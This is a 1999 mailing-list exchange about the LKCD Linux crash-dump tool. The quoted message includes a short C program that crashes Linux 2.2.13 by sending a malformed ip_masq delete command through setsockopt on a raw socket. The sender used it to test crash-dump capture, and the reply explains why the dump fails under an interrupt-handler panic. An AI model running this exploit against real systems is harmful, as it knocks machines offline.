Hi, Brian.

I'll run a few tests on this today. Just an FYI, the reason why
ours and MCL's code doesn't work correctly is because you're panicking
in an interrupt handler, which means you're calling down() twice,
which inevitably breaks the crash dump process. I have a set of code
which avoids this problem, but I'm not sure how to integrate it into
the kernel, since it is SCSI specific (again).

The real point is, if you try to use I/O interrupts to disk when you're
already locking out interrupts, you're not going to be able to dump data
to disk. It's a problem we are working on.

I'll try out your code today and try to have feedback for you if not
today, then tomorrow. Thanks!

--Matt

On Tue, 7 Dec 1999, Brian Hall wrote:
|>Today there was a post on the kernel list of a snippet of C code to crash the
|>2.2.13 kernel via an ip_masq exploit. After modifying this to compile (header
|>names were slightly different for some reason), I ran it to test lkcd. The
|>system crashed so fast I could barely see what went on. Looked like several
|>oopses scrolled by, then the dreaded "killing interrupt handler" message. No
|>crash dump was generated. I have successfully created crash dumps on this
|>system via the tests described in the FAQ.
|>
|>My question is, will or can this be fixed in a future version of lkcd? I don't
|>mean specifically relative to this crash case, but in the general "killing
|>interrupt handler" case. Mission Critical Linux claimed they were going to fix
|>this same type of problem in a future version of their crash patch. As of now
|>they are about three weeks overdue on that.
|>
|>The code:
|>
|>/* crash 2.2.13 kernel exploiting a bug in ip_masq_user.c (c)djsf */
|>
|>#include <stdio.h>
|>#include <linux/types.h>
|>#include <net/if.h>
|>#include <netinet/in.h>
|>#include <netinet/ip.h>
|>/*
|>#include <netinet/ip_tcp.h>
|>#include <netinet/ip_udp.h>
|>*/
|>#include <netinet/tcp.h>
|>#include <netinet/udp.h>
|>
|>#include <netinet/ip_icmp.h>
|>#include <linux/ip_fw.h>
|>#include <linux/ip_masq.h>
|>
|>int main()
|>{
|>    int sock;
|>    struct ip_masq_ctl mctl;
|>
|>    memset (&mctl, 0, sizeof (mctl));
|>    mctl.m_target = IP_MASQ_TARGET_USER; mctl.m_cmd = IP_MASQ_CMD_DEL;
|>    mctl.u.user.protocol = IPPROTO_UDP;
|>    if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
|>        perror ("socket"); exit (1);
|>    }
|>    if (setsockopt (sock, IPPROTO_IP, IP_FW_MASQ_CTL, &mctl, sizeof (mctl)))
|>        perror ("kab00m failed :) ");
|>    exit (0);
|>}
|>
|>--
|>Brian Hall <brianw.hall@xxxxxxxxxx>
|>Linux Consultant
|